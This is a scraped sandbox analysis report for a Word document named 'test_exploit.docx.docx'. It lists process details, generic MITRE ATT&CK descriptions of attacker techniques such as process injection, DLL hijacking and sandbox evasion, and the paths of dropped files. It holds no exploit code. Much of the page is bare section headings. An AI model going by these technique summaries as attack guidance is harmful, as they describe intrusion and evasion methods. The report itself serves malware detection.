Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: splwow64.exePID: 3092, Parent PID: 6420

General

Target ID:	15
Start time:	17:07:36
Start date:	18/06/2022
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff769c90000
File size:	130560 bytes
MD5 hash:	8D59B31FF375059E3C32B17BF31A76D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report test_exploit.docx.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\162E0FB2-22FE-47A8-BEDD-0137327DF29A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\27C32ABB.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\827D74FF.dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBBF4665.htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\ED025776.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\exp[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exp[1].htm

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\test_exploit.docx.docx.LNK

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

C:\Users\user\Desktop\~$st_exploit.docx.docx

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
test_exploit.docx.docx